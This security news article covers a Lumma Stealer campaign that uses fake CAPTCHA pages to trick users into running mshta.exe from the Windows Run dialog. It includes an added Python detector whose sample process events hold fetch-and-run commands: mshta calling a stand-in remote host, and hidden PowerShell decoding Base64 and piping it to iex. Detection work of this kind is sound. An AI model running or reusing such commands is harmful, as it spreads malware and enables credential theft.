Beware of Fake Captcha Verification Checks That Deliver Lumma Malware

Netskope Threat Labs has uncovered a new global malware campaign deploying the Lumma Stealer through fake CAPTCHA pages.

Lumma Stealer, a malware-as-a-service (MaaS) threat observed since 2022, is being used to target victims across multiple industries, including telecommunications, healthcare, banking, and marketing.

Regions affected by the attack include Argentina, Colombia, the United States, the Philippines, and other countries worldwide.

Fake CAPTCHAs

The infection chain begins when an unsuspecting victim is redirected to a fake CAPTCHA page upon visiting a compromised website.

Figure: Infection Chain

Since August 2024, Lumma Stealer campaigns have employed a specific type of fake CAPTCHA that instructs users to run commands directly on their Windows systems.

This technique cleverly bypasses browser-based cybersecurity controls, as the malicious commands are executed outside the browser’s context.

The fake CAPTCHA prompts the user to press “Windows + R” to open the Run dialog, paste the clipboard content that the CAPTCHA’s embedded JavaScript has placed there, and press “Enter.”

Figure: Fake CAPTCHA instruction

Behind the scenes, the JavaScript code injects a command that uses the legitimate Windows tool mshta.exe.

This tool downloads and executes an HTA file from a remote server, a technique categorized as a “Living Off the Land Binary” (LOLBIN) attack.

By abusing trusted, signed Windows binaries such as mshta.exe, attackers circumvent endpoint defenses that trust those binaries and security controls that only inspect the browser.

Multi-Stage Payload Execution

The payloads observed in this campaign carry a variety of file extensions, including .mp3, .accdb, and .pub, but the extensions are a disguise: every one of these files is malware.

Upon execution, these payloads run malicious JavaScript code that calls a PowerShell command to decode a Base64-encoded data chunk and execute the next stage of the infection chain.

The PowerShell commands trigger the download of larger, obfuscated scripts from external servers.

These scripts perform advanced evasion techniques, such as bypassing the Windows Antimalware Scan Interface (AMSI).

This bypass is achieved by modifying the memory of the clr.dll module to prevent AMSI from being invoked during the execution of the payload.

Netskope researchers noted that the attackers used open-source AMSI bypass snippets, further complicating detection efforts.

Subsequently, a Base64-encoded payload is decoded into a Portable Executable (PE) file, which is loaded and executed using reflection.

The final payload in this chain is the Lumma Stealer malware, which is designed to harvest sensitive data from infected systems.

Notably, the attackers employed tools like Babel for payload obfuscation, making reverse engineering and analysis increasingly challenging for cybersecurity experts.
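The chain described above leaves two distinctive process-creation artifacts on the endpoint: the Run dialog is hosted by explorer.exe, so the pasted command appears as explorer.exe spawning mshta.exe with a remote URL, and the HTA's script then spawns PowerShell to decode a Base64 blob. The detection logic below is an added example, not code from Netskope or the article; the process events, host name, and Base64 string are constructed sample data.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
# pids 4100 -> 5200 -> 5300 model the fake-CAPTCHA chain: Run dialog -> mshta.exe -> powershell.exe.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3000, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 5200, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://cdn.example.invalid/verify/captcha.mp3"},
    {"pid": 5300, "ppid": 5200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('QUJD'))|iex\""},
    # Benign noise: an admin runs a local HTA, and PowerShell is started from a console.
    {"pid": 6100, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe", "cmd": r"mshta.exe C:\tools\inventory.hta"},
    {"pid": 6200, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 6300, "ppid": 6200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-Process"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Base64 indicators: the .NET decode call or the -enc/-EncodedCommand switch.
B64_DECODE = re.compile(r"FromBase64String|-e(?:nc(?:odedcommand)?)?\b", re.IGNORECASE)
# Extensions the campaign used to disguise HTA payloads (mshta ignores the extension).
DISGUISED_EXT = re.compile(r"\.(mp3|accdb|pub)\b", re.IGNORECASE)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix_chain(events):
    """Return (pid, rule, severity) tuples for events matching the mshta -> PowerShell chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        name = basename(e["image"])
        pname = basename(parent["image"]) if parent else ""
        # Stage 1: mshta.exe fetching a remote HTA. A parent of explorer.exe means it came
        # from the Run dialog or a double-click, i.e. user-pasted, which matches the lure.
        if name == "mshta.exe" and REMOTE_URL.search(e["cmd"]):
            severity = "high" if pname == "explorer.exe" or DISGUISED_EXT.search(e["cmd"]) else "medium"
            findings.append((e["pid"], "mshta_remote_hta", severity))
        # Stage 2: the HTA's JavaScript calling PowerShell to decode the next stage.
        if name in SHELLS and pname == "mshta.exe" and B64_DECODE.search(e["cmd"]):
            findings.append((e["pid"], "mshta_child_base64_powershell", "high"))
    return findings


if __name__ == "__main__":
    for pid, rule, severity in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"pid={pid} rule={rule} severity={severity}")
```

The local .hta run and the console-launched PowerShell produce no findings, so the two rules fire only on the parent-child shape the campaign relies on.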

The Lumma Stealer MaaS platform has demonstrated consistent evolution in its delivery methods, payloads, and evasion techniques.

Its reliance on abusing user interaction, trusted Windows binaries, and advanced obfuscation poses significant challenges to traditional security solutions.

This latest campaign highlights the importance of educating users about social engineering tactics, bolstering endpoint detection and response (EDR) mechanisms, and continuously monitoring emerging threats.
